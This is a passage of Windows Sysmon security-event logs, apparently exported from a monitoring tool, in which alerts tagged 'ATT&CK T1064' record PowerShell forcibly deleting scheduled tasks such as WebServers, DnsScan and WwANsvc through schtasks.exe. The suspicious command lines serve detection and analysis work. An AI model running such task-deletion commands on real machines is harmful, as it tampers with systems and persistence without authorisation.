+User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.969955600Z"",""eventRecordID"":""3581"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:09.965\r\nProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901c2f00}\r\nProcessId: 4668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:09.965"",""processGuid"":""{df9fc3d3-b3f9-5ecf-0000-0010901c2f00}"",""processId"":""4668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.304",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:09.925 +ProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901a2f00} +ProcessId: 6228 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.933002800Z"",""eventRecordID"":""3580"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:09.925\r\nProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901a2f00}\r\nProcessId: 6228\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:09.925"",""processGuid"":""{df9fc3d3-b3f9-5ecf-0000-0010901a2f00}"",""processId"":""6228"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:37.328",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:09.101 +ProcessGuid: {df9fc3d3-b3f9-5ecf-0000-001058152f00} +ProcessId: 4196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.130118900Z"",""eventRecordID"":""3579"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:09.101\r\nProcessGuid: {df9fc3d3-b3f9-5ecf-0000-001058152f00}\r\nProcessId: 4196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:09.101"",""processGuid"":""{df9fc3d3-b3f9-5ecf-0000-001058152f00}"",""processId"":""4196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:37.297",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.973 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001022122f00} +ProcessId: 5000 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.024207700Z"",""eventRecordID"":""3577"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.973\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001022122f00}\r\nProcessId: 5000\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.973"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001022122f00}"",""processId"":""5000"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:37.281",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.878 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ca0f2f00} +ProcessId: 8140 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.889431900Z"",""eventRecordID"":""3576"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.878\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ca0f2f00}\r\nProcessId: 8140\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.878"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-0010ca0f2f00}"",""processId"":""8140"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.780",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.723 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00106d0d2f00} +ProcessId: 4772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.729472800Z"",""eventRecordID"":""3575"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.723\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00106d0d2f00}\r\nProcessId: 4772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.723"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00106d0d2f00}"",""processId"":""4772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.645",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.652 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010630b2f00} +ProcessId: 6656 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 